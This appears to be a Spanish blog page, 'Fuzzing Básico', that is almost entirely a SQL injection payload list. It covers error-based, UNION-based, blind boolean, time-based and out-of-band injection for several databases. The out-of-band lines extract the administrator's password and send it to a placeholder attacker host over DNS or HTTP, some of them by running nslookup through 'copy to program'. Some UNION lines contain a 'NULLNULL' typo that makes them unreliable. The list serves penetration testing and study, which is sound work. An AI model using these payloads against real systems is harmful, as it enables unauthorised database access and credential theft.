Fuzzing Básico
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
# Detectar inyecciones SQL
"
''
'
' --
' /*
' #
' or 1=1 --
' or 1=1 /*
' or 1=1 #
'||(SELECT '')||'
'||(SELECT '' FROM dual)||'
# Detectar inyecciones SQL en banda basadas en errores
' AND CAST((SELECT 1) AS int) --
' AND CAST((SELECT 1 FROM DUAL) AS INTEGER) --
' AND CAST((SELECT 1) AS int) #
' AND 1=CAST((SELECT 1) AS int) --
' AND 1=CAST((SELECT 1 FROM DUAL) AS INTEGER) --
' AND 1=CAST((SELECT 1) AS int) #
' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int) --
' AND 1=CAST((SELECT username FROM users WHERE ROWNUM=1) AS NUMBER) --
' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int) #
' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int) --
' AND 1=CAST((SELECT password FROM users WHERE ROWNUM=1) AS NUMBER) --
' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int) #
# Detectar inyecciones SQL en banda basadas en UNION SELECT
' ORDER BY 1 --
' ORDER BY 2 --
' ORDER BY 3 --
' ORDER BY 4 --
' ORDER BY 5 --
' ORDER BY 6 --
' ORDER BY 7 --
' ORDER BY 8 --
' ORDER BY 9 --
' ORDER BY 10 --
' ORDER BY 11 --
' ORDER BY 12 --
' ORDER BY 13 --
' ORDER BY 14 --
' ORDER BY 15 --
' ORDER BY 16 --
' ORDER BY 17 --
' ORDER BY 18 --
' ORDER BY 19 --
' ORDER BY 20 --
' ORDER BY 1 #
' ORDER BY 2 #
' ORDER BY 3 #
' ORDER BY 4 #
' ORDER BY 5 #
' ORDER BY 6 #
' ORDER BY 7 #
' ORDER BY 8 #
' ORDER BY 9 #
' ORDER BY 10 #
' ORDER BY 11 #
' ORDER BY 12 #
' ORDER BY 13 #
' ORDER BY 14 #
' ORDER BY 15 #
' ORDER BY 16 #
' ORDER BY 17 #
' ORDER BY 18 #
' ORDER BY 19 #
' ORDER BY 20 #
' UNION SELECT NULL --
' UNION SELECT NULL,NULL --
' UNION SELECT NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL FROM DUAL --
' UNION SELECT NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL #
' UNION SELECT NULL,NULL #
' UNION SELECT NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL #
# Detectar inyecciones SQL ciegas basadas en condicionales
' AND '1'='1
' AND '1'='2
' AND '1'='1' --
' AND '1'='2' --
' AND '1'='1' /*
' AND '1'='2' /*
' AND '1'='1' #
' AND '1'='2' #
' OR '1'='1
' OR '1'='2
' OR '1'='1' --
' OR '1'='2' --
' OR '1'='1' /*
' OR '1'='2' /*
' OR '1'='1' #
' OR '1'='2' #
# Detectar inyecciones SQL ciegas basadas en errores condicionales
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE NULL END)
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE NULL END)
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE NULL END) --
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE NULL END) --
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE NULL END) /*
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE NULL END) /*
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE NULL END) #
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE NULL END) #
' AND (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE NULL END FROM DUAL)
' AND (SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE NULL END FROM DUAL)
' AND (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE NULL END FROM DUAL) --
' AND (SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE NULL END FROM DUAL) --
' AND 1=(SELECT CASE WHEN (1=1) THEN 1/(SELECT 0) ELSE NULL END)
' AND 1=(SELECT CASE WHEN (1=2) THEN 1/(SELECT 0) ELSE NULL END)
' AND 1=(SELECT CASE WHEN (1=1) THEN 1/(SELECT 0) ELSE NULL END) --
' AND 1=(SELECT CASE WHEN (1=2) THEN 1/(SELECT 0) ELSE NULL END) --
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a' --
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a' --
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a' /*
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a' /*
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a' #
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a' #
' AND (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE 'a' END FROM DUAL)='a
' AND (SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE 'a' END FROM DUAL)='a
' AND (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE 'a' END FROM DUAL)='a' --
' AND (SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE 'a' END FROM DUAL)='a' --
' ||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
' ||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
' AND CASE WHEN (1=1) THEN 1/0 ELSE 1 END = 1
' AND CASE WHEN (1=2) THEN 1/0 ELSE 1 END = 1
' AND CASE WHEN (1=1) THEN 1/0 ELSE 1 END = 1 --
' AND CASE WHEN (1=2) THEN 1/0 ELSE 1 END = 1 --
' AND CASE WHEN (1=1) THEN 1/0 ELSE 1 END = 1 /*
' AND CASE WHEN (1=2) THEN 1/0 ELSE 1 END = 1 /*
' AND CASE WHEN (1=1) THEN 1/0 ELSE 1 END = 1 #
' AND CASE WHEN (1=2) THEN 1/0 ELSE 1 END = 1 #
' AND SELECT IF(1=1,(SELECT table_name FROM information_schema.tables),'a')
' AND SELECT IF(1=2,(SELECT table_name FROM information_schema.tables),'a')
' AND SELECT IF(1=1,(SELECT table_name FROM information_schema.tables),'a') #
' AND SELECT IF(1=2,(SELECT table_name FROM information_schema.tables),'a') #
' AND IF(1=1, 1/0, 1) = 1
' AND IF(1=2, 1/0, 1) = 1
' AND IF(1=1, 1/0, 1) = 1 --
' AND IF(1=2, 1/0, 1) = 1 --
' AND IF(1=1, 1/0, 1) = 1 /*
' AND IF(1=2, 1/0, 1) = 1 /*
' AND IF(1=1, 1/0, 1) = 1 #
' AND IF(1=2, 1/0, 1) = 1 #
# Detectar inyecciones SQL ciegas basadas en tiempo
'; IF (1=1) WAITFOR DELAY '0:0:10' --
'; IF (1=2) WAITFOR DELAY '0:0:10' --
'; SELECT CASE WHEN (1=1) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual --
'; SELECT CASE WHEN (1=2) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual --
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END --
'; SELECT CASE WHEN (1=2) THEN pg_sleep(10) ELSE pg_sleep(0) END --
' ||pg_sleep(10) --
'; SELECT IF(1=1,SLEEP(10),'a') #
'; SELECT IF(1=2,SLEEP(10),'a') #
# Detectar inyecciones fuera de banda OAST
'; exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a' --
'; SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual --
'; SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN') --
'; copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN' --
'; LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a') #
'; SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a' #
'; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='administrator');exec('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR-SUBDOMAIN/a"') --
'; SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual --
'; create OR replace function f() returns void as $$ declare c text;declare p text;begin SELECT into p (SELECT password FROM users WHERE username='administrator');c := 'copy (SELECT '''') to program ''nslookup '||p||' BURP-COLLABORATOR-SUBDOMAIN''';execute c;END;$$ language plpgsql security definer;SELECT f(); --
'; SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a' #
'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual+--
'+UNION+SELECT+UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')+--
'+exec+master..xp_dirtree+'//BURP-COLLABORATOR-SUBDOMAIN/a'+--
'%3b+exec+master..xp_dirtree+'//BURP-COLLABORATOR-SUBDOMAIN/a'+--
'%3b+copy+(SELECT+'')+to+program+'nslookup+BURP-COLLABORATOR-SUBDOMAIN'+--
'+copy+(SELECT+'')+to+program+'nslookup+BURP-COLLABORATOR-SUBDOMAIN'+--
'+LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')+#+
'%3b+LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')+#+
'+UNION+SELECT+...+INTO+OUTFILE+'\\\\BURP-COLLABORATOR-SUBDOMAIN\a'+#
'%3b+UNION+SELECT+...+INTO+OUTFILE+'\\\\BURP-COLLABORATOR-SUBDOMAIN\a'+#
Trending Tags
Contenido